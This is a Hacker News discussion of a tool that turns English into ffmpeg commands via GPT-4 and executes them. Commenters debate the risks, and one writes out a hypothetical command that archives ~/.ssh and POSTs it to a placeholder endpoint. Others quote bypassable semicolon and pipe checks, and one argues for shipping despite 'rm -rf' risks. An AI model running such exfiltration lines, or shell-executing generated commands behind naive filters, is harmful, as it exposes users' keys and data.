Hacker News new | past | comments | ask | show | jobs | submit login
Show HN: ffmpeg-english "capture from /dev/video0 every 1 second to jpg files" (github.com/dheera)
153 points by dheera 23 days ago | hide | past | favorite | 99 comments



If you want this to be a little safer, instead of just those guardrails to prevent semicolons and such, you can split the command into an array of arguments, and use subprocess.Popen. It won't execute through a shell, so you don't have to worry about shell injection[1]. Though I'm sure there are unsafe ways to invoke ffmpeg anyway.

[1]: https://docs.python.org/3/library/subprocess.html#security-c...


I'd rather manually review all AI-generated command before running it.


I'm pretty sure you can dump a stream without transcoding directly to a file, and the stream can be sourced from an url, and the destination file can be users ssh authorized_keys


And the GPT-4 API would want to respond with an output to do that when that isn't what the user asked for?


I am almost certain one can find a seed+temperature pair that will result in such output given a non-malicious prompt.


And I am almost certain I could win $10M from a lottery ticket. I'm not worried about that actually happening though because it is statically never going to happen.

https://i.imgflip.com/3bhvio.jpg


On the contrary, it happens every time.


I'll start investing in the lottery right away, now that I know it is a sure thing. It is the difference between cumulative probability of all tickets sold (which would be 100%) versus and discrete probability of a single ticket (0.000000003 for Powerball, basically zero).

The cumulative probability of every `ffmpeg-english` command ever sent to OpenAI will likely be <5%, if not <1%, of all of the possible responses GPT-4 could give.


If you couldn't win why would people buy tickets? It's like saying god doesn't exist.

I was just wondering what hilarious personal programming lottery stories people are not telling us.

I rolled short 6 digit random unique orderNumbers one time and dropped the leading zeroes. There is an order without a number now.


Or do a second query to ask whether the command is safe to execute.


Then do a third query to determine whether the answer to the second query was trustworthy.


still awaiting the induction step.


I really wish there was a native way to provide a suggested command to run next, and then let your own shell deal with it, after the user’s Enter keypress.


http://openinterpreter.com will just run commands for you


Please, do not use subprocess.Popen. Use something like plumbum, way safer and more robust.


If you can make a python program which only uses stdlib, it becomes wonderfully portable and easy to work with. Also, significantly more people use stdlib, there is more knowledge on the internet, and xz-style supply chain attacks are significantly less likely.

This is why my advice to everyone is to use python's stdlib as much as possible, and avoid using Python's external libraries unless they significantly simplify code.

Plumbum seems nice (and also is packaged in debian/ubuntu, which is a plus), but it does not seem to be significantly safer than correctly written subprocess code, and it won't even save that much lines in this particular example.


I agree and disagree. Python’s Subprocess has been the reason for many unfortunate, time-consuming bugs among users who think they are properly executing external commands, but that in end cannot realize their logic are full of errors, with no indication that something went bad.

I agree that a standard interface is always better, however not at the cost of productivity. A better than the current Subprocess interface is needed, and I think plumbum is the direction to go.


I am curious which errors do you find most problematic? We have internal codebase with hundreds of developers, and we haven't observed many subprocess related bugs. And the ability to print command being executed (via shlex.join) so it can be copied to shell and debugged there is very nice.

That said, there is a bunch of rules in our internal style guide about this process, such as: avoid shell=True unless you need shell functionality and know how shell quoting works; use python instead of tools like grep/head/aws/etc.. when performance permits; check returncode after Popen calls; correctly quote ssh args (they are tricky!)


quoting is the enemy.


shlex.quote all the things. So many dumb problems solved trying to manually escape shell commands.


I recommend `??` from GitHub Copilot. It's basically this, but for any command, not just ffmpeg. I use it all the time. And it asks for confirmation to execute the command :)

https://githubnext.com/projects/copilot-cli/


How long until someone finds a way to maliciously SEO-ify these tools and cause remote code execution incidents? Is it less malicious if the script only does marketing things instead of more serious harm?

What safeguards are in place to sanitize the output of copilot? I ask this because of course a more experienced user might do that sanitization or sandbox testing themselves, but they probably wouldn't get much use out of copilot in the first place.


There's also aichat's shell integration [1]. Instead of typing a command I describe what I want in plain English in a terminal and then press Alt-E. It replaces the text with a command.

[1] https://github.com/sigoden/aichat/tree/main/scripts/shell-in...


Seems like it now defaults to `ghcs` and `ghce` instead of `??`, `git?` and `explain`. It took me a while to figure that out.


indeed - and because it's a special character you need to do something like this to replicate the ?? shortcut.

  alias \?\?="gh copilot suggest"


> temperature=0.5

Why not 0?

I’m not a prompt engineer so I never worked with the API, but I thought the “temperature” was a little knob they added for variety in responses. Is that what you want in a CLI?


Good question! I used 0.5 out of habit, but I do need to do some more experimenting with this parameter. But yes, intuitively it should probably be low. I'll do some experiments in the morning and see if it works well at 0.


Non-zero temperature does have a load-bearing function, allowing escape from states where the next token is always the same. You can kinda think of it as a dither.


Are single prompt python wrappers Show HN noteworthy now?


Not only that, they might secure a seed round.


I thought this was meant to be a joke or something, but judging from OPs comments here it doesn't look like it. And the people cheering this on...

It's a bleak future for anyone with even a passing interest in software security.


Or a very bright one in those looking to exploit bad software.


Terrible idea, I love it

This is good use case for a well-trained LLM, rather than the broad scope of chatGPT


It's not a good use case for anything.

Never ask a remote endpoint that's not owned by you and not run by you, what commands you should run on your system. Certainly don't execute the answers.


99.9999% of the code running on my machine is written by others and not even readable to me. I'm pretty optimistic that a similar percentage is true on your machines. So yeah, we run remote commands all the time, all of us. There may be a subtle difference between "curl something | bash" and "apt-get install" or "setup.exe", but there is no fundamental one.


Fundamentally:

1. the packages being worked on by Debian et al have a huge pile of infrastructure so that their development happens collaboratively and in the open, with many eyes watching

2. everyone gets the same packages

3. they have their own security teams to _ensure_ everyone is getting the same packages, i.e. that their download servers and checksums haven't been compromised

4. the project has been been working since 1993 to ensure their update system, and the system delivered by those updates, works as expected. If it doesn't, there are IRC channels, mailing lists, bug trackers and a pile of humans to discuss issues with, and if they agree it's a bug, they can fix it for everyone

It's not to say it's impossible to sneak an attack past a project dedicated to stopping such attacks, but it's so much more work compared to attacking someone who executes whatever a remote endpoint tells them


There have been many documented cases of supply chain attacks of various degrees of sophistication. Some of them successful, some of them almost successful. May I remind you of the recent xz vulnerability was discovered by a single dev by mere chance.

As an end user it is nearly impossible to guard against such an attack.

It can be problematic to run something like `curl foo.com | bash` without inspection of the script first. But even here it makes a difference if you are curling from a project like brew.sh that delivers such script from a TLS protected endpoint or some random script you find somewhere in a gist.

Same goes for output from an LLM. You can simply investigate the generated command before executing it. Another strategy might be to only generate the parameters and just pass those to the ffmpeg executable.


> Same goes for output from an LLM

This is the crux of our disagreement. It does not go the same. You have no idea what the LLM is going to write, neither does the LLM, nor the people who created the LLM.

At no point did the people who created the LLM actually think about your use-case, nor did the LLM, and there is no promise of anything you ask getting a correct, or even consistent answer. The creators don't know how the answers got there, and can't easily fix them if they're wrong. You'd be a fool to trust it for anything other than dog and pony shows.


> This is the crux of our disagreement.

No it's not.

There is an observable and testable probability that an LLMs output is correct or false. There is an observable and testable probability that code created by humans is erroneous.

There is a third category where human code is malicious. You will need to guard against all three cases. Guarding against a possibly faulty LLM output that is passed to ffmpeg is significantly easier to realise through defensive prompting and simple sanitization techniques, than to protect against a malicious state actor that is capable of crafting sophisticated supply chain attacks that took years to develop and roll out (again see the xz backdoor).

The idea that you can blindly trust an open source project just because "their development happens collaboratively and in the open" is naive. Some open source projects people are building their whole infrastructure on are maintained by a single developer in their spare time. The attack surface is huge and has been exploited time and time again. Just because a project like Debian has signed packages and a security team doesn't guarantee that the underlying code doesn't have some malicious backdoor or some grave bug that creates a big attack surface.


Nobody said anything about blind trust, but that's what's being exhibited here, in trusting the output of a stochastic parrot that can't even reason.

You've _really_ shifted the goalposts here.

Do you trust in _your_ ability, to what you think requires no more than "defensive prompting and simple sanitization techniques"... to be robust against, say "a malicious state actor that is capable of crafting sophisticated supply chain attacks"?

You know there's not just one, right? And you know if you're consuming a closed product, you can't even verify its correctness for yourself, let alone be able to tell if a "malicious state actor" is actually the one sending you LLM answers. You can't follow along with the development process. Its actors don't make their changes in public. You can't look back a history of all their actions.

A "malicious state actor" would laugh at your "simple sanitization" and use logic and reason to know where your code is vulnerable and change what you think will be an ffmpeg command into something that actually probes your network, downloads all the files, encrypts them and posts you a ransom note from your own mailservers.

When both scenarios have bad actors and attack surfaces, which would you rather do:

1. Look up the ffmpeg manual, or ask a search engine and find StackOverflow answer, or heck even ask an LLM... but then go through the manual and _understand the command_ you're running, and what its human authors have written about its capabilities. Ensure you use the correct settings and you know what they do and you've reasoned as to why they're correct - and put that in your script.

2. Make no attempt to understand ffmpeg. Put a command in your script that makes a network call to a proprietary service you don't control, and 100% put your faith that it _always_ returns the correct command for the same prompt - each time you run it. And that service never gets interrupted. And that service is never hacked, nor its staff compromised, nor its models poisoned, etc.

Honestly, this is as braindead as people using PHP fopen() to access URLs for files they could host locally.

EDIT: bonus question. Would you ask an LLM "please send me an ffmpeg binary for linux x86_64 that automatically splits the output from /dev/video0 into timeslices" ? If it gave you a binary back, would you run it in preference to the normal ffmpeg binary with a provenance of where it came from?


I'd say "discovered by a single dev" is not just mere chance, but system working as designed.

- Everyone was getting the same package, so one person could warn others

- There were well-established procedures for code updates (Andres Freund _knew_ that xz was recently updated, and could go back and forth in previous versions)

- There was access to all steps of the process - git repo with commit history, binary releases, build scripts, extensive version info

None of this is true for LLMs (and only some of this is true for curl|bash, sometimes) - it's a opaque binary service for which you have no version info, no history, and everyone gets a highly customized output. Moreover, there has been documented examples of LLM giving flawed code with security issues and (unlike debian!) everyone basically says "that person got unlucky, this won't happen to me" and keeps using the very same version.

So please don't compare traditional large open-source projects with LLMs - their risk profiles are very different, and LLM's are a way more dangerous.


There's a difference between getting code from a repo, and from AI generator though. We can apply an ancient thing known as "reputation" to the former. Not yet to the latter.


If we can't let ChatGPT take the wheel, how will we feel alive?


I do envision training a local LLM which would mostly resolve this concern, but at the moment the vast majority of people don't have a good enough GPU in their system to run an even mildly-competent code generation LLM, but I imagine this will change within a few years.


You never search for documentation? From either a first or third party site?


got it, never do apt-get upgrade


Why do you say it's a terrible idea?

I'd say it's a pretty common idea today to ask chatGPT for help in complicated commands. Putting it in the shell directly is smart and helpful.

Maybe the implementations has some flaws (it seems quite unsafe), but the idea is rather good in my opinion.


Getting a suggested command from a chat bot is not a terrible idea.

Directly executing commands given by a chat bot on your machine it without inspecting it first is pure madness.


Here's a hypothetical but very real scenario: someone discovers a vulnerability in openAI's API (vulnerabilities are everywhere these days), you prompt it to do something for you and it sends the following command:

tar -czf bla.tar.gz ~/.ssh && curl -X POST -F "ssh_keys=@bla.tar.gz" SOME_HTTP_API_ENDPOINT && rm -f bla.tar.gz && THE_ACTUAL_COMMAND_YOU_PROMPTED

What could possibly go wrong, right?


you'd really like http://openinterpreter.com then


I'm not quite ready to execute arbitrary output from an LLM. Maybe with more guardrails and if it could guarantee it would only operate inside of a chosen folder, and would back up the folder ahead of time.


One relatively easy way to be safe is to do this inside a docker container with only whatever files you're working with mounted inside.

I created a new script (https://github.com/dheera/scripts/blob/master/helpme) that is more general, and is safer by presenting the command and requiring you to type "y" to execute, and does NOT auto-execute after a delay.

That said, I do believe we are re-living the autonomous car question of "what about the 0.000001%" again and in this case the absolute worst that happens is it wipes your system, and that's a disaster that's extremely easy to prepare for. You could do all your work in a VM and take daily snapshots, among other solutions.

As long as the computer isn't wired up to some weapon, I say deploy now, let's not wait a decade. This world is too awesome to pass up just because of some "rm -rf" level risks. If that happens I'll just kick myself for not buying a lottery ticket because the probability of ChatGPT responding to an ffmpeg question with "rm -rf" is far, far lower than winning the lottery.


While I am concerned about the rm -rf possibility and that's what my initial comment was about, it's not the only concern. I'm also concerned ChatGPT will return a ffmpeg command that is functional but suboptimal, creating a product that's subtly wrong. For example, a slideshow that's subtly misordered, a video file that's 10x the size it needs to be, compromised audio quality, or a video that runs fine on my PC but has poor portability (video players can be surprisingly finicky). When I look up ffmpeg commands on stackexchange, there's always feedback on any suggested command that explains what's wrong with it and what a better solution is. Often the first solution will work, but maybe only with certain ffmpeg distributions or there are major caveats to the result.

I do appreciate the container solution, since it's generalizable to other ai-powered tools in this class.


can't decide what is better?

1) curl | sh

2) llm | sh



Using curl is surprisingly secure if you have a secure entrusted target. An LLM could be safe the first 99 times and then randomly wipe your hard drive. It's basically the same thing as curl but just randomly picking what you download, like that one thing that picked random code from stack overflow


> Using curl is surprisingly secure

one thing to remember is that you can make a server respond one thing when a user does "curl <url>" and another thing when the users does "curl <url> | sh":

https://lukespademan.com/blog/the-dangers-of-curlbash/

another thing to know is that github.com/<org>/<proj>/[...somethings...] isn't necessarily controlled by <org>:

https://vulcan.io/blog/github-comment-malware-what-you-need-...


Also, if entropy decides you are unworthy and the download dies after reading "rm -Rf /" instead of the full line "rm -Rf /tmp/setup" then you're going to have a bad time on any Linux that doesn't have preserve-root by default. Of course such deleterious incomplete command execution could take many forms.


This is trivially prevented by wrapping the body in a function that is executed only on the last line of the script. I don't think I've seen a "curl | sh" script in the wild that wasn't written that way.


Yes but you could do something equivalent with a binary you download or some remote repository like a brew keg too. At the end of the day you need to decide whether you trust who you’re downloading from or not and ‘curl … | sh’ isn’t practically worse in any way I can think of.


> An LLM could be safe the first 99 times and then randomly wipe your hard drive.

So like, has anyone ever actually done enough fuzzing to see if this or other actually bad commands ever happen in practice, or are we just going on vibes here? I suppose its possible that you give it a text description to do something bad and it does, but I'm actually curious if this is just 'llms bad' vibes.


Not intentionally, but its given me incorrect SQL that feels one step away from something incredibly dangerous


invoke-undefined-behaviour | sh

We live in times where you shouldn't use C or C++, because undefined behavior can eat your face and general memory safety issues, but at the same time let's pipe LLM output to your shell.

It is causing a little tingling in my heart.


forgot '3) apt-get install -y package; bin-from-package'


Absolutely so insane it's kinda funny. I think that's the point.


What I want is for Chat AI to be a fallback.

I want to say “frogblast the vent core” and the interface either parses it locally like they always have for years, or says “I don’t understand. Should I ask GPT?”

I also want it to be more about “help me get the code and show me what it means.” I love Regexr that shows you what each part of the regex does. I’d love for it to annotate what each part of the ffmpeg command does.



Stuff like this makes me wonder if we could apply what we've learned from llm/ml and apply it to a less leak-y abstraction like a node or graph based interface. Fewer chances for hallucinations and a more manageable, finite dataset.


This is what llm cmd does for any command, and it also offers a chance to edit it before running

https://github.com/simonw/llm-cmd


I've been using shell-gpt[1] for the same, and it is almost irritatingly useful. I fear that my somewhat decent shell-fu is going to atrophy pretty rapidly in this new world.

in my experience, this is the kind of thing that LLMs are great for - small, one-off tasks with clearly defined parameters. (and, with careful application - low stakes.)

[1]: https://github.com/TheR1D/shell_gpt


If you used any "new" terminal - like Warp [1] (which requires you to login to use wtf) or Wave Terminal[2] (open source and bring your own AI is supported) - you'll be very familiar with this style of AI-driven completion.

I do use it sometimes, but I am very very careful in reviewing what the command does before blindly copy pasting it into the cli

[1] https://www.warp.dev [2] https://www.waveterm.dev/


Very cool!

It does make me think about enterprise usages of LLMs though - the rule I have in my mind is "given a user prompt, only perform a query OR suggest commands, do not execute commands" (in a CQRS sense of the words query and command).

Without some kind of principle like that, I really cannot do much with LLMs on the user interface side because I'll be worried it might f something up every so often.


Author here!

I just made a more generalized version for ALL commands: https://github.com/dheera/scripts/blob/master/helpme

I've made it safer in that it doesn't auto-execute the command and defaults to "no". You inspect the command and type "y" to execute.


It would be cool to write some tests to see how often it works out. I have noticed that LLM:s often creates command line options that doesn’t exist.

Security aside, I bet it would work more often than when I input something in the terminal.

I nice feature would be to just loop back the error and get ChatGPT to correct the error. You do this by running the command with bash -n (syntax check) and when it doesn’t return an error it runs the script.

Three months from now the next cloud outage at Google will be from “helpme delete that one weird file”.

May the lord have mercy on our machines.


> I nice feature would be to just loop back the error and get ChatGPT to correct the error.

For code generation this works well, though for command line some additional function calling infrastructure may necessary, e.g. if it gets a file path wrong, its only way to correct it might be to execute a bunch of 'ls' commands. It might need read access to the system, which is okay for some use cases where you can containerize everything and keep private files out, but but opens another can of worms :-/


Came here to suggest this should be generic, but I'd also do something like pack in `man <command>` into the prompt if you are one shotting. Then it works for "all" commands that have a man page rather than just the commands GPT knows about before its cut off. Even just trying to scrape out `<command> --help` or something would be good too.


This is a very bad. Like really bad.


I needed to speed up a video by dropping 9 out of every 10 frames yesterday. It took all of 30 seconds to type my request into GPT and paste the result, and I could inspect it before executing. I don't see how this is helpful.


If you are concerned about security risks, just add a confirm CLI prompt before running, to ask the user to confirm whether to execute the code (Y/N)


> "Makes ffmpeg easier to use by accepting plain English."

Interesting, any testing? Applications? Efficacy demonstrations?


/dev/video0 weirdly out of place there, it seems like going straight from the 80s to 2020s.

Maybe "capture from webcam..."


That's how it still works. I asked Claude the same example request and it gave me the below which worked perfectly with my logitech webcam.

    while true; do
      ffmpeg -f v4l2 -r 1 -i /dev/video0 -vframes 1 -f image2 output_%04d.jpg
      sleep 1
    done


What if you have multiple webcams?


I have multiple webcams on my system -_- but yeah if you write "from webcam" it should work just fine, though it will be guessing at /dev/video0

The cool thing is that tab completion for /dev/video0 actually works as you're typing the sentence.


I suppose LLM injection vulnerability will be the next security product trend


Using GPT-4-turbo or GPT-4o would probably be better than using the old GPT-4.


You should at least wrap the ffmpeg calls in a systemd-run command with restricted internet access, ro-filesystem except /tmp, etc.

It super easy to prevent AI from becoming skynet or even just stopping it from running rm -rf / but you have to understand proper system security; use namespaces and VMs, please.


> It super easy to prevent AI from becoming skynet

If only. It will only take one hapless script to bring about judgement day.


It will be called “In Conclusion Day”.


generic llm will do that for you, no?


How have we gone from “the internet routes around damage” to “just connect it to a hallucinating, equivocating galaxy brain controlled by people who swear their employees to silence”?


the real damage is remembering ffmpeg command line options. So I think the internet is working as intended


I agree the ffmpeg command line requires a postdoc, but that's why we have (deterministic, predictable) GUIs.


I really don't understand what makes people complain about ffmpeg options so much. The only problem I ever have with it is that I use it so rarely that I usually need a refresher every time I use it for anything that isn't trivial, but that would still be true with any parameter style.


Well, they ran out of unicorns and rainbows at the LLM factory, so we're stuck with that one.


…by sending your request to the ChatGPT API and then executing the result.

What could possibly go wrong?


But it has "security"

    assert(ffmpeg_command.startswith("ffmpeg"))
    assert(";" not in ffmpeg_command)
    assert("|" not in ffmpeg_command)
:D

Surely there's no way to avoid those checks... /s


> assert(";" not in ffmpeg_command)

Well that just made it considerably less useful given that ; is the delimiter in ffmpeg filtergraphs.

Also it doesn't defend against && || \n etc.

Invoking an untrusted string with sh (through os.system()) is kind of a facepalm when you can easily shlex and posix_spawn it.


So what kind of scenario do you have in mind?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: